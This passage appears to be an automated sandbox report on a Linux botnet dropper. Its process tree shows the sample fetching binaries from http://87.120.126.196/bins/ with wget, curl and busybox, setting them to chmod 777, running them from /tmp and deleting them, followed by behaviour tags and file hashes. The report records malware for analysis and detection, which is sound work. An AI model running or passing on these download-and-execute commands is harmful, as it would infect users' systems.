/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:945
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:951
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:957
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:963
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:969
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:975
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:981
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97